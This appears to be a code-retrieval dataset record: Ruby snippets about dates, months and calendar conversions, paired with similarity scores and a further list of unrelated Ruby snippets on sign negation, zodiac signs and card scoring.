"def calc_days_in_month month, year\n months_with_30 = [4, 6, 9, 11]\n months_with_31 = [1, 3, 5, 7, 8, 10, 12]\n if months_with_30.include? month\n 30\n elsif months_with_31.include? month\n 31\n elsif (year % 4 == 0) && !(year % 100 == 0) || (year % 400 == 0)\n 29\n else\n 28\n end\n end",
"def day() end",
"def inspect\n \"the day of the month is the \" + ordinal_list(@parts)\n end",
"def roman_from_fixed(f_date)\n j_date = julian_from_fixed(f_date)\n month = standard_month(j_date)\n day = standard_day(j_date)\n year = standard_year(j_date)\n month_prime = amod(1 + month, 12)\n year_prime = (if month_prime != 1\n year\n elsif year != -1\n year + 1\n else\n 1\n end)\n kalends1 = fixed_from_roman(roman_date(year_prime, month_prime, KALENDS, 1, False))\n\n res = if day == 1\n roman_date(year, month, KALENDS, 1, False)\n elsif day <= nones_of_month(month):\n roman_date(year, month, NONES, nones_of_month(month)-day+1, False)\n elsif day <= ides_of_month(month):\n roman_date(year, month, IDES, ides_of_month(month)-day+1, False)\n elsif (month <> FEBRUARY) or not is_julian_leap_year(year):\n roman_date(year_prime, month_prime, KALENDS, kalends1 - date + 1, False)\n elsif day < 25:\n roman_date(year, MARCH, KALENDS, 30 - day, False)\n else\n roman_date(year, MARCH, KALENDS, 31 - day, day == 25)\n end\n return res\n end",
"def ordinalDate\n ordinal = DAYS_THUS_FAR[@month].to_i + @day.to_i\n if leapYear? && @month > 2\n ordinal = ordinal + 1\n end\n return ordinal\n end",
"def getDate(day, month, year)\n day << @day\n month << @month\n year << @year\n end",
"def days_in_current_month\n\t\t\tcurrent_month = Time.now.month\n\t\t\tcurrent_year = Time.now.year\n\n\t\t\treturn Time.days_in_month(current_month, current_year)\n\t\tend",
"def card_month\n card[:month].to_i\n end",
"def mday\n end",
"def rsmonth(month)\n case month\n when 1\n return 'januar'\n when 2\n return 'februar'\n when 3\n return 'mart'\n when 4\n return 'april'\n when 5\n return 'maj'\n when 6\n return 'jun'\n when 7\n return 'jul'\n when 8\n return 'avgust'\n when 9\n return 'septembar'\n when 10\n return 'oktobar'\n when 11\n return 'novembar'\n when 12\n return 'decembar'\n end\nend",
"def day_of_month(days, *extras)\n merge(mday: days.array_concat(extras))\n end",
"def nth_negative_instance_of_day_in_month(date)\n # How many days are there in this month? We'll grab the first of next month, then roll\n # back a day to see.\n next_month = Time.utc(date.year, (date.month % 12) + 1)\n next_month = Time.utc(next_month.year + 1, next_month.month) if next_month < date\n month_days = (next_month - 86400).day\n return -1 - ((month_days - date.day) / 7)\n end",
"def dmonth(delta=0)\n ty = Time.now.utc\n m1 = 1 + (ty.month + delta - 1) % 12\n y1 = ty.year + (ty.month + delta - 1) / 12\n m2 = 1 + (ty.month + delta) % 12\n y2 = ty.year + (ty.month + delta) / 12\n puts m1, y1, m2, y2\n {\n :from => Time.utc(y1,m1),\n :to => Time.utc(y2,m2)\n }\n end",
"def days_until_xmas(date)\n return 0\nend",
"def month; end",
"def month; end",
"def statement_day_ordinal\n return '' if statement_day.nil?\n statement_day.ordinalize\n end",
"def yday() end",
"def islamictojd(year, month, day)\n\n\t#\tyear = (year <= 0 ? year + 1 : year)\n\n\tif ( year < 0 )\n\n\t\tyear = 1\n\n\tend\n\n\treturn day + (29.5 * (month - 1)).ceil + (year - 1) * 354 + ((3 + (11 * year)) / 30).floor + $jdepoch - 1\n\nend",
"def iffer(day,month)\n if month == 2 && day == 29\n return true\n else\n return false\n end\nend",
"def year_and_month_to_int(year, month)\n (year * 12) + (month - 1)\n end",
"def days_in_month\n @date_time_value.days_in_month\n end",
"def add_months(year, month, day , offest )\n\n\n\t### From Hijri to Julian to Gregorian date \n\n\tgd = fromjdtog(islamictojd(year.to_i, month.to_i, day.to_i))\n\n\t### Add months to Gregorian date \n\n\tparsed_date = Date.new( gd[0] , gd[1] , gd[2]) \n\n\tgd_after_add = parsed_date.months_since(offest)\n\n\tgd_after_add = gd_after_add.to_s(:db)\n\n\t### From Gregorian to Julian to Hijri date \t\n\n\thd_after_add = fromjdtoislamic(gtojd(gd_after_add[0,4].to_i,gd_after_add[5,2].to_i,gd_after_add[8,2].to_i))\n\n\t## Return Hijri date \n\n\t#return year.to_s + '-' + month.to_s + '-' + day.to_s + ' بعد اضافة ' + offest.to_s + ' شهر ' + hd_after_add.to_s\n\n\treturn hd_after_add\n\nend",
"def months() 30 * days end",
"def vix_futures_settlement_date(year, month)\n subsequent_month, year_of_subsequent_month = *next_month(month, year)\n third_friday_of_subsequent_month = nth_weekday_of_month(3, DayOfWeek::Friday, subsequent_month, year_of_subsequent_month)\n if cboe_holiday?(third_friday_of_subsequent_month)\n prior_cboe_business_day(third_friday_of_subsequent_month) - 30\n else\n third_friday_of_subsequent_month - 30\n end\nend",
"def month\n sunday = @monday + 6\n return 1 if sunday.month == 1 && sunday.year == @year\n return 12 if @monday.month == 12 && @monday.year == @year\n (@monday + 2).month\n end",
"def yday\n end",
"def age_in_days(day, month, year)\n# TODO: return the age expressed in days given the day, month, and year of birth\n big_age = Date.today\n small_age = Date.parse(\"#{year}-#{month}-#{day}\")\n age = big_age - small_age\n return age.to_i\nend",
"def this_month\n day(Time.now)\n end",
"def day_of_month\n start_on.day.to_s\n end",
"def fixed_monthly_payment(amount, months, ir )\n amount*( ir * ( 1 + ir ) **months )/(( 1 + ir )**months - 1 )\nend",
"def get_days(year,month)\r\n # the number of days within a month is determined by the year\r\n case month\r\n when \"January\", \"March\", \"May\", \"July\", \"August\", \"October\", \"December\"\r\n days = 31\r\n when \"April\", \"June\", \"September\", \"November\"\r\n days = 30\r\n else\r\n if year.to_i % 400 == 0 # feb has 28 days when a year divisible by 400\r\n days = 28\r\n elsif year.to_i % 4 == 0\r\n days = 29\r\n else\r\n days = 28\r\n end\r\n end # end statement for case month when ...\r\n return days\r\n end",
"def normalize_month(month)\n month % 12 + 1\n end",
"def cwday\n end",
"def make_days\n month = (1..@day_num).collect do |day|\n Day.new(Date.parse(\"#{@year}-#{@month}-#{day}\"))\n end\n\n month[0].date.wday.times { month.insert(0, Day.new(Date.new))}\n month\n end",
"def es_menor(dia,mes,anio)\n fecha = false\n \tif (mes >= 1) && (mes <= 12) then\n\t\t\tcase mes\n\t\t\t\twhen 1,3,5,7,8,10,12 then\n\t\t\t\t\tmax = 31\n\t\t\t\twhen 4,6,9,11 then\n\t\t\t\t\tmax = 30\n\t\t\t\twhen 2 then\n\t\t\t\t\tif (es_bisiesto(anio) == true) then\n\t\t\t\t\t\tmax = 29\n\t\t\t\t\telse\n\t\t\t\t\t\tmax = 28\n\t\t\tend\n\t\tend\n\t\t\n\t\tif (dia >= 1) && (dia <= max)\n\t\t\tbirth = Date.civil(anio, mes, dia)\n\t\t\tnow = Date.today\n\t\t\tdifference_in_days = (now - birth).to_i\n\t\t\tdiff = (difference_in_days / 365.25).to_i\n\t\t\t\n\t\t\tif diff < 17\n\t\t\t\tfecha = true\n\t\t\tend\n\t\tend\n else\n\t\t\tfecha = false\n end\n return fecha\n\tend",
"def ultimoDia (mes, ano=7)\n fim_do_mes = { \"1\" => \"31\", \"01\" => \"31\", \"2\" => \"28\", \"02\" => \"28\", \"3\" => \"31\",\n \"03\" => \"31\", \"4\" => \"30\", \"04\" => \"30\", \"5\" => \"31\", \"05\" => \"31\",\n \"6\" => \"30\", \"06\" => \"30\", \"7\" => \"31\", \"07\" => \"31\", \"8\" => \"31\",\n \"08\" => \"31\", \"9\" => \"30\", \"09\" => \"30\", \"10\" => \"31\", \"11\" => \"30\",\n \"12\" => \"31\" }\n\n ultimo_dia = fim_do_mes[mes]\n\n # anos bissextos\n if ultimo_dia == \"28\" && ((ano % 4 == 0 && ano % 100 != 0) || ano % 400 == 0)\n ultimo_dia = ultimo_dia + 1\n end\n\n return ano + \"-\" + mes + \"-\" + ultimo_dia\n end",
"def days\n Advert.days_for_months(months)\n end",
"def jpd_cycle\r\n jpd_date - $jpd_2000\r\nend"
] | [
"0.7116016",
"0.69404125",
"0.6122316",
"0.6122316",
"0.5967227",
"0.59496856",
"0.5906849",
"0.58797467",
"0.58797467",
"0.5717164",
"0.57162505",
"0.57162505",
"0.5711818",
"0.5694669",
"0.5647944",
"0.5647944",
"0.5646241",
"0.5644094",
"0.56300116",
"0.55933905",
"0.55865675",
"0.55671644",
"0.5496876",
"0.54952127",
"0.54952127",
"0.5491841",
"0.5435919",
"0.5431969",
"0.54019856",
"0.5388121",
"0.538514",
"0.53487927",
"0.533815",
"0.5318619",
"0.5316674",
"0.5302787",
"0.5288686",
"0.52872217",
"0.52855587",
"0.52751553",
"0.52551955",
"0.5247186",
"0.5228511",
"0.52230346",
"0.52140635",
"0.5212886",
"0.52079976",
"0.5191221",
"0.5167747",
"0.51556253",
"0.5152574",
"0.5132327",
"0.5130115",
"0.5118255",
"0.51130265",
"0.511085",
"0.5103347",
"0.5089437",
"0.50805855",
"0.5077509",
"0.5073571",
"0.5073354",
"0.50538063",
"0.50518835",
"0.5036635",
"0.5035381",
"0.50324535",
"0.50269186",
"0.49928108",
"0.49922624",
"0.49883813",
"0.4988245",
"0.49866468",
"0.49846518",
"0.4982495",
"0.49780595",
"0.49780595",
"0.4962821",
"0.4952922",
"0.49502265",
"0.49415433",
"0.4936049",
"0.49351987",
"0.49242347",
"0.4923994",
"0.49230945",
"0.4922937",
"0.4912302",
"0.49093476",
"0.4893712",
"0.48838037",
"0.48731366",
"0.4860493",
"0.48446697",
"0.484403",
"0.4829252",
"0.48255163",
"0.48187327",
"0.4814879",
"0.48142818"
] | 0.72031826 | 0 |
Returns the opposite of the given zodiac sign. 0 is Aries, 11 is Pisces. | def zodiacOpposite(sign)
return (sign+6)%12
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def negative\n abs.flip_sign\n end",
"def reverse_sign(an_integer)\n return 0 - an_integer\nend",
"def reverse_sign(an_integer)\n return 0 - an_integer\nend",
"def opposite(number)\r\n return number * (-1)\r\nend",
"def zodiacValue(sign)\n return (sign)%12\nend",
"def opposite(number)\n return 0 - number\nend",
"def opposite(number)\n number*-1\nend",
"def flip_sign\n self * -1\n end",
"def opposite(num)\n if num < 0\n return num.abs\n else num >= 0\n return num * -1 end\nend",
"def opposite(x)\n x * -1\nend",
"def opposite num\n -num\n end",
"def neg?\n sign < 0\n end",
"def opposite(x)\n puts -(x)\nend",
"def negative(number)\n -(number.abs)\nend",
"def not_zero(number)\n if number == 0\n return \"-\"\n else\n return number\n end\n end",
"def get_sign(coefficient)\r\n if coefficient < 0\r\n '-'\r\n else \r\n '+' \r\n end\r\n end",
"def zodiacComplements(sign)\n return [(sign+1)%12,(sign+11)%12]\nend",
"def zodiacComplements(sign)\n return [(sign+1)%12,(sign+11)%12]\nend",
"def neg(num)\n val = Convert(num, :numeric)\n sub(Convert(0, val.type), val)\n end",
"def negative(number)\n -number.abs\nend",
"def negative(number)\n -number.abs\nend",
"def negative(number)\n -number.abs\nend",
"def negative(number)\n -number.abs\nend",
"def negative2(number)\n -number.abs\nend",
"def negative(input, name: nil)\n negate(input, name: name)\n end",
"def negative(input, name: nil)\n negate(input, name: name)\n end",
"def negative(number)\n return number if number.negative? || number.zero?\n -number\nend",
"def make_negative(n)\n -(n.abs)\nend",
"def neg(direction)\n case direction.to_s\n when 'right'\n 'left'\n when 'left'\n 'right'\n when 'top'\n 'bottom'\n when 'bottom'\n 'top'\n end\n end",
"def negative(num)\n - num.abs\nend",
"def negation\n \"not\" if negate?\n end",
"def negative(number)\n number > 0 ? (number * -1) : number\nend",
"def negative(number)\n number > 0 ? -number : number\nend",
"def negative(number)\n number > 0 ? -number : number\nend",
"def make_numbers_negative(number)\n number *= -1 if \"++-\"[number <=> 0] == \"+\"\n number\n\n # -number.abs\nend",
"def makeNegative(num)\r\n if num >= 0\r\n return num * (-1)\r\n else\r\n return num * 1\r\n end\r\n end",
"def reverseNumber(n)\n n.to_s[0] == '-' ? -(n.to_s.reverse.to_i) : n.to_s.reverse.to_i\n # if n.to_s[0] == '-'\n # -(n.to_s.reverse.to_i)\n # else\n # n.to_s.reverse.to_i\n # end\nend",
"def negate?\n @negate\n end",
"def negative(num)\n num.positive? ? -num : num\nend",
"def negative(num)\n num > 0 ? -num : num # or -num.abs\nend",
"def negative(input)\n input.abs * -1\nend",
"def negative(num)\n if num.positive?\n -num\n else\n num\n end\nend",
"def negative(number)\n number <= 0 ? number : number * -1\nend",
"def negate?\n @negate\n end",
"def opposite n\n\t\tif n%2 == 0\n\t\t\treturn n+1\n\t\telse\n\t\t\treturn n-1\n\t\tend\n\tend",
"def -@\n return self.invert\n end",
"def -@\n return self.invert\n end",
"def sign(x)\n big_dec_sign = x.sign\n if big_dec_sign < 0\n -1\n elsif big_dec_sign > 0\n +1\n end\n end",
"def make_numbers_negative(number)\n number.positive? ? -(number) : number\nend",
"def reverse(z)\n\tx = z\n\ty = 0\n\twhile x!=0 do\n\t\ty *= 10\n\t\ty += x%10\n\t\tx /= 10\n\tend\n\treturn y\nend",
"def negative(num)\n num > 0 ? -num : num\nend",
"def negative(num)\n num > 0 ? -num : num\nend",
"def negative(num)\n num > 0 ? -num : num\nend",
"def negative(num)\n num > 0 ? -num : num\nend",
"def negative(num)\r\n num > 0 ? -num : num \r\nend",
"def reverse_ruby(x)\n x_rev_signed = x.positive? ? '' : '-'\n x_rev = (x_rev_signed + x.to_s.split('-').last.reverse).to_i\n x_rev.bit_length > 31 ? 0 : x_rev\nend",
"def make_numbers_negative(number)\n -number.abs\nend",
"def nozero(num)\n num > 0 ? -num : num \nend",
"def neg(n1)\n @number = -n1.number\n return self\n end",
"def negative(num)\n num <= 0 ? num : -num\nend",
"def negative(num)\n num <= 0 ? num : -num\nend",
"def invert(num) \n puts -num \nend",
"def complement(bit)\n bit.succ % 2\n end",
"def negative?; end",
"def negative(number)\n if number > 0\n -number\n else\n return number\n end\nend",
"def negative(n)\n return n if n <= 0\n -n\nend",
"def opposite(direction)\n op = {\"south\" => \"north\", \"north\" => \"south\", \"east\" => \"west\", \"west\" => \"east\", \"down\" => \"up\", \"up\" => \"down\"}\n return op[direction]\n end",
"def negative(num)\n return num if num.negative?\n -num\nend",
"def negative?\n !@positive \n end",
"def makeNegative(num)\n num > 0 ? num * -1 : num\nend",
"def invert!(alpha = false); end",
"def negative(num)\n num < 0 ? num : -num\nend",
"def test_negative_symbol\n test_value = RPN.symbol?('-')\n assert_equal(test_value,0)\n end",
"def negative(int)\n int <= 0 ? int : -int\nend",
"def make_negative(number)\n if number > 0\n number - (number.abs * 2)\n else \n number\n end\nend",
"def negative(integer)\n integer > 0 ? -integer : integer\nend",
"def convert_binary_to_signed_negative(address)\n twos_compliment = convert_to_signed_twos_complement address.to_i(2)\n HumanComputer::Processor.eight_bitify twos_compliment\n end",
"def negative?\n !!@negative\n end",
"def makeNegative(num)\n num < 0 ? num : -num\nend",
"def negative(num)\n\n if num <=0\n num\n else \n num * -1\n end\nend",
"def get_negate(n, algebraic_structure)\n negates_commaed = TYPE_SYMBOLS.first(n).each_with_index.map{ |t, i| \"#{t.downcase}#{algebraic_structure}.negate(tuple._#{i+1})\" }.join(\", \")\n \"override def negate(v: X) = { val tuple = unapply(v).get; apply(#{negates_commaed}) }\"\nend",
"def makeNegative(num)\n if(num.to_s.start_with?(\"-\"))\n return num\n else\n return -num\nend\nend",
"def make_negative(number)\n if number > 0\n number - (-number * -2)\n else\n number\n end\nend",
"def isnegative(siffra)\n output = false\n if siffra < 0\n output = true\n end\n\n return output\nend",
"def execute_NEG(operand)\n\t\t# all flags affected\n\t\tset_auxiliary_carry_flag_from 0 - operand.value.lowest_4_bits\n\t\tperform_arithmetic_operation_storing_result(operand, operand, 0 - operand.value)\n\tend",
"def invert() end",
"def opposite\n @opposite ||= DIRECTIONS[DIRECTIONS.index(direction) - 1]\n end",
"def negative?\n @negative\n end",
"def negative?\n @negative\n end",
"def negative(num)\n if num <= 0 \n return num\n else\n return num - (num * 2)\n end\nend",
"def negative(num)\n\treturn -num unless num <= 0\n\tnum\nend",
"def make_negative(num)\r\n num > 0 ? -num : num\r\nend",
"def state_neg\n case @scanner\n when INT\n integer(-(@scanner.matched.to_i))\n :state_op\n end\n end",
"def negate!\n negate self\n end",
"def negative(num)\n num *= -1 if num > 0\n num\nend",
"def negative(num)\n num < 0 ? num : -1 * num\nend",
"def nsw_neg(arg, name = \"\")\n Instruction.from_ptr(C.build_nsw_neg(self, arg, name))\n end",
"def negate(input, name: nil)\n _op(:negate, input, nil, name: name)\n end",
"def nuw_neg(arg, name = \"\")\n Instruction.from_ptr(C.build_nuw_neg(self, arg, name))\n end"
] | [
"0.6672668",
"0.6554936",
"0.6554936",
"0.65460396",
"0.6495725",
"0.64195913",
"0.6415371",
"0.641393",
"0.6412919",
"0.6399172",
"0.6367187",
"0.63448083",
"0.62792665",
"0.6030122",
"0.60131836",
"0.59967226",
"0.5991377",
"0.5991377",
"0.59625506",
"0.59225416",
"0.59225416",
"0.59225416",
"0.59225416",
"0.58594966",
"0.5858761",
"0.5858761",
"0.5834581",
"0.58157706",
"0.58077645",
"0.5807124",
"0.5801726",
"0.58009315",
"0.579166",
"0.579166",
"0.5786929",
"0.57833666",
"0.57768786",
"0.5751214",
"0.5746926",
"0.57370037",
"0.5733904",
"0.57301354",
"0.5710452",
"0.5708309",
"0.5685286",
"0.5670483",
"0.5670483",
"0.5666641",
"0.56218195",
"0.56212324",
"0.561878",
"0.561878",
"0.561878",
"0.561878",
"0.56093353",
"0.5603179",
"0.5601058",
"0.55982274",
"0.55892044",
"0.55888444",
"0.55888444",
"0.55828613",
"0.5582443",
"0.5571881",
"0.55708605",
"0.5554141",
"0.5552332",
"0.5551811",
"0.5523913",
"0.5523462",
"0.5515687",
"0.5512264",
"0.5510735",
"0.55099237",
"0.5502203",
"0.54954803",
"0.54928726",
"0.54918176",
"0.5488317",
"0.54874986",
"0.5478076",
"0.5472043",
"0.5470142",
"0.5439235",
"0.5413787",
"0.54111356",
"0.54051876",
"0.5404786",
"0.5404786",
"0.5397081",
"0.5392163",
"0.5388995",
"0.5388798",
"0.53864443",
"0.5380561",
"0.5375858",
"0.5359276",
"0.5349303",
"0.5347484"
] | 0.78304255 | 0 |
0 is Aries, 11 is Pisces. | def zodiacPartners(sign)
return [(sign+4)%12,(sign+8)%12]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def cardinal; end",
"def kcallipidos\n\t\t\t@lipidos * 9\n\t\tend",
"def rentas\n profesion ? 1 : 0\n end",
"def pontosStrike index\n\t\tif @rolls[index + 2]\n\t\t\tif @rolls[index + 2] == 10\n\t\t\t\tif @rolls[index + 4]\n\t\t\t\t\t10 + 10 + @rolls[index + 4]\n\t\t\t\telse\n\t\t\t\t\t10 + 10\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tif @rolls[index + 3]\n\t\t\t\t\t10 + @rolls[index + 2] + @rolls[index + 3]\n\t\t\t\telse\n\t\t\t\t\t10 + @rolls[index + 2]\n\t\t\t\tend\n\t\t\tend\t\n\t\telse \n\t\t\t10\n\t\tend\n\tend",
"def psh_bonuses(roll)\n case roll\n when 1..5\n @@skills << \"Brawling\"\n puts \"Brawling skill\"\n when 6..10\n @@skills << \"Stealth\"\n puts \"Stealth skill\"\n when 11..15\n @@skills << \"Weapons Expert\"\n puts \"Wpn expert!\"\n when 16..20\n @@skills << \"Dodge\"\n puts \"Dodge skill\"\n when 21..37\n @@endurance += 1\n @@strength += 1\n @@agility += 1\n @@accuracy += 1\n @@willpower += 1\n @@intelligence += 1\n @@perception += 1\n @@appearance += 1\n puts \"+1 to each attribute\"\n when 38..44\n @@endurance += (d(6) + d(6))\n puts \"+2d6 endurance\"\n when 45..51\n @@strength += (d(6) + d(6))\n puts \"+2d6 strength\"\n when 52..58\n @@agility += (d(6) + d(6))\n puts \"+2d6 agility\"\n when 59..65\n @@accuracy += (d(6) + d(6))\n puts \"+2d6 accuracy\"\n when 66..74\n @@intelligence += (d(6) + d(6) + d(6))\n puts \"+3d6 intelligence\"\n when 75..83\n @@willpower += (d(6) + d(6))\n puts \"+2d6 willpower\"\n when 84..90\n @@appearance += (d(6) + d(6) + d(6))\n puts \"+3d6 appearance\"\n when 91..97\n @@skills << \"Martial Arts\"\n puts \"Martial arts skill!\"\n when 98..99\n @@endurance += 2\n @@strength += 2\n @@agility += 2\n @@accuracy += 2\n @@willpower += 2\n @@intelligence += 2\n @@perception += 2\n @@appearance += 2\n puts \"+2 to each attribute\"\n when 100\n @@endurance += d(6)\n @@strength += d(6)\n @@agility += d(6)\n @@accuracy += d(6)\n @@willpower += d(6)\n @@intelligence += d(6)\n @@perception += d(6)\n @@appearance += d(6)\n puts \"JACKPOT -- +d6 to EACH Attribute!\"\n end\n\n end",
"def imc\n\t\tnum = (@peso/(@talla*@talla)).round(2)\n\t\tif num < 18.5\n\t\t\tnum #- Bajo peso\"\n\t\telsif num > 18.5 and num < 24.9\n\t\t\tnum #- Adecuado\"\n\t\telsif num > 25.0 and num < 29.9\n\t\t\tnum #- Sobrepeso\"\n\t\telsif num > 30.0 and num < 34.9\n\t\t\tnum #Obesidad grado 1\"\n\t\telsif num > 35.0 and num < 39.9\n\t\t\tnum #- Obesidad grado 2\"\n\t\telsif num > 40\n\t\t\tnum #- Obesidad grado 2\"\n\t\tend\t\t\t\n\tend",
"def pontosSpare index\n\t\tif @rolls[index + 1]\n\t\t\t10 + @rolls[index + 1]\n\t\telse\n\t\t\t10\n\t\tend\n\tend",
"def scorePaper m\n\t\t[0,1]\n\tend",
"def scorePaper m\n\t\t[1,0] \n\tend",
"def ordinal; end",
"def smart_aces hand\n# Adjusts the value of \"Ace\" elements to be either 1 or 11 depending on the hand total\n\thand_total = hand.reduce :+\n\tif hand_total < 12 && hand_total > 2\n\t\thand.map! do |card|\n\t\t\tif card == 1\n\t\t\t\t11\n\t\t\telse\n\t\t\t\tcard\n\t\t\tend\n\t\tend\n\telsif hand_total > 21\n\t\thand.map! do |card|\n\t\t\tif card == 11\n\t\t\t\t1\n\t\t\telse\n\t\t\t\tcard\n\t\t\tend\n\t\tend\n\telsif hand_total == 2\n\t\thand[0] = 11\n\tend\n\nend",
"def scoreRock m\n\t\t[0,1] \n\tend",
"def total\n total = 0\n aces = 0\n @hand.each do |card|\n case card[0]\n when 2..10 then total += card[0]\n when 'A' then aces += 1\n else total += 10\n end\n end\n total += add_aces(total, aces)\n total\n end",
"def raindrops num\n output = \"\"\n output << \"Pling\" if num % 3 == 0\n output << \"Plang\" if num % 5 == 0\n output << \"Plong\" if num % 7 == 0\n output.empty? ? num.to_s : output\nend",
"def vypis_reseni\n\n vystup = \"(\"\n @reseni.each do |prvek|\n if(prvek)then\n vystup += \"1\"\n else\n vystup += \"0\"\n end \n end\n vystup += \")\"\n \n return vystup\n end",
"def natural_bonus\n 0\n end",
"def values\n return [1,11] if ace?\n return [10] if face_card?\n [@identifier]\n end",
"def numbers\n @board.map!.with_index do |e, i|\n e == AIR ? i.to_s : e\n end\n draw_board\nend",
"def scoreRock m\n\t\t[1,0]\n\tend",
"def value(hand)\n # Sorting hack to get aces at the very end so we count them last\n hand.sort_by { |c| c.to_i != 0 ? c : c[0] - 81 }.reverse().inject(0) do |total,cur|\n if cur.to_i != 0\n total + cur # 2-10 case\n elsif [\"J\",\"Q\",\"K\"].include? cur\n total + 10 # J,Q, or K\n elsif cur == \"A\"\n if (total+11) > 21\n total + 1 # Count ace as 1\n else\n total+11 # Count ace as 11\n end\n end\n end\n end",
"def raindrops(number)\n raindrops_str = ''\n\n raindrops_str += 'Pling' if number % 3 == 0\n raindrops_str += 'Plang' if number % 5 == 0\n raindrops_str += 'Plong' if number % 7 == 0\n\n if raindrops_str == ''\n raindrops_str = number.to_s\n end\n\n raindrops_str\nend",
"def dices\n\t\t@rollAgain = 0\n\t\t@goalParam = 0\n\tend",
"def primordial; end",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3 \n end",
"def succ\n if (@type == \"t\" && @number == 4) || (@type != \"t\" && @number == 9)\n number = 1\n elsif @type == \"t\" && @number == 7\n number = 5\n else\n number = @number + 1\n end\n return Pai.new(@type, number)\n end",
"def charge(age)\n case age\n when (0..6)\n 0\n when (7..12)\n 300\n when (13..18)\n 600\n else\n 1000\n end\nend",
"def set\n\t$one = \"1\"\n\t$two = \"2\"\n\t$three = \"3\"\n\t$four = \"4\"\n\t$five = \"5\"\n\t$six = \"6\"\n\t$seven = \"7\"\n\t$eight = \"8\"\n\t$nine = \"9\"\n\t$turn = 0\t\t\nend",
"def fo_tool\n return actor.equips[0] if actor.primary_use == 1\n return actor.equips[1] if actor.primary_use == 2\n return actor.assigned_item if actor.primary_use == 3\n return actor.assigned_item2 if actor.primary_use == 4\n return actor.assigned_item3 if actor.primary_use == 5\n return actor.assigned_item4 if actor.primary_use == 6\n return actor.assigned_skill if actor.primary_use == 7\n return actor.assigned_skill2 if actor.primary_use == 8\n return actor.assigned_skill3 if actor.primary_use == 9\n return actor.assigned_skill4 if actor.primary_use == 10\n end",
"def score\n\t\tpontos = 0\n\t\tindex = 0\n\t\twhile (index < 20 && @rolls[index]) do\n\t\t\tif strike? index\n\t\t\t\tpontos += pontosStrike (index)\n\t\t\telsif spare? index\n\t\t\t\tpontos += pontosSpare (index)\n\t\t\telsif @rolls[index + 1]\n\t\t\t\tpontos += @rolls[index] + @rolls[index + 1]\n\t\t\telse\n\t\t\t\tpontos += @rolls[index]\n\t\t\tend\n\t\t\tindex += 2\n\t\tend\n\t\tpontos\n\tend",
"def card_scores\n card_scores = {\n \"JOKER\" => 13, \"J♠\" => 12, \"J♣\" => 11, \"A♠\" => 10, \"K♠\" => 9, \"Q♠\" => 8,\n \"10♠\" => 7, \"9♠\" => 6, \"8♠\" => 5, \"7♠\" => 4, \"6♠\" => 3, \"5♠\" => 2\n }\n card_scores.default = 0\n\n card_scores\n end",
"def clasificar\n if @sal <= 1\n \"poca\" \n elsif @sal > 1 and @sal <= 2\n \"media\"\n elsif @sal > 2\n \"mucha\"\n end\n end",
"def Traductor nume\n\nnumero = {}\nnumero[0] = \"Cero\"\nnumero[1] = \"Uno\"\nnumero[2] = \"Dos\"\nnumero[3] = \"Tres\"\nnumero[4] = \"Cuatro\"\nnumero[5] = \"Cinco\"\nnumero[6] = \"Seis\"\nnumero[7] = \"Siete\"\nnumero[8] = \"Ocho\"\nnumero[9] = \"Nueve\"\nnumero[10] = \"Diez\"\n\n\n\nreturn numero[nume.to_i]\n\n\nend",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3\n end",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3\n end",
"def boatswain\n return self.swabbie unless self.swabbie.nil?\n highval = 0\n self.axe.each do |flotsam|\n counter = self.filibuster(flotsam)\n highval = ((highval <=> counter) == 1) ? highval : counter\n end\n \".#{highval + 1}\"\n end",
"def single_card_value(card)\n case card[1].strip\n when \"2\"..\"10\" then card[1].to_i\n when \"J\", \"Q\", \"K\" then 10\n when \"A\" then 11\n end\nend",
"def get_hand_value(hand)\n hand_values = hand.map { |card| card[0]} \n \n total = 0\n #check if there are any Aces\n hand_values.each do |value|\n if value == 'A'\n total += 11\n elsif value.to_i == 0 # this is for J, Q, K\n total += 10\n else\n total += value.to_i\n end\n end\n # To accomodate Aces, subtract 10 from the total per Ace if the total is >21\n hand_values.select{|value| value == \"A\"}.count.times do \n total -= 10 if total >21\n end\n total\nend",
"def score \n return 'love' if @points == 0 \n return 'fifteen' if @points == 1 \n return 'thirty' if @points == 2 \n return 'forty' if @points == 3\n end",
"def apportion\n 385.times do |n|\n state = find_highest_priority\n @seats[state] += 1\n\n seat_number = 51 + n\n puts \"Assigning Seat #{seat_number} to #{state}\"\n end\n\n puts \"Just missed the cut...\"\n state = find_highest_priority\n puts \"Seat 436 would be assigned to #{state}\"\n\n @seats.each do |state, seats|\n printf(\"%20s\\t%3d\\n\", state, seats)\n end\n end",
"def scoreScissors m\n\t\t[0,1] \n\tend",
"def score(card)\n case card\n when :ace then 11 # assigns value to each symbol, helps with scoring\n when :king then 10\n when :queen then 10\n when :jack then 10\n else card\n end\nend",
"def pcode4\n school.sierra_code\n end",
"def ace_check\n cards[index_of_11][:points] = 1 if index_of_11 && (total > 21)\n end",
"def get_hand_score\n score = 0\n \n # Add up score of non-aces\n values = hand.map{|card| card.value}\n values.each do |val|\n if Array(2..10).include?(val.to_i)\n score += val.to_i\n elsif [\"J\", \"Q\", \"K\"].include?(val)\n score += 10\n end\n end\n\n # deal with the aces\n values.count(\"A\").times do\n if score + 11 <= 21\n score += 11\n else\n score += 1\n end\n end\n\n return score\n end",
"def digit; end",
"def check4aces num\n \tnum.each do |x|\n\t\tif x == 11\n\t\t\t@pScore.delete(11)\n\t\t\t@pScore << 1\n\t\tend\n\tend\n end",
"def roman digit\n\n\trules = [ 'I', 'V', 'X', 'L', 'C', 'D', 'M']\n\tnum = digit[0]\n\tplace = digit[1]\n\n\nromannumeral = []\nif num == 5\n\tromannumeral.push rules[place+1].to_s\n\n\nelse if num > 5\n\tromannumeral.push rules[place+1].to_s\n\tnum = num - 5\n\tnum.times do\n\tromannumeral.push rules[place].to_s\n\tend\n\nelse if num < 5\n\tnum.times do\n\t\tputs 'num<5'\n\tromannumeral.push rules[place].to_s\n\tend\n\n\tend\n\tend\n\tend\n\nreturn romannumeral\nend",
"def goal\n 28\n end",
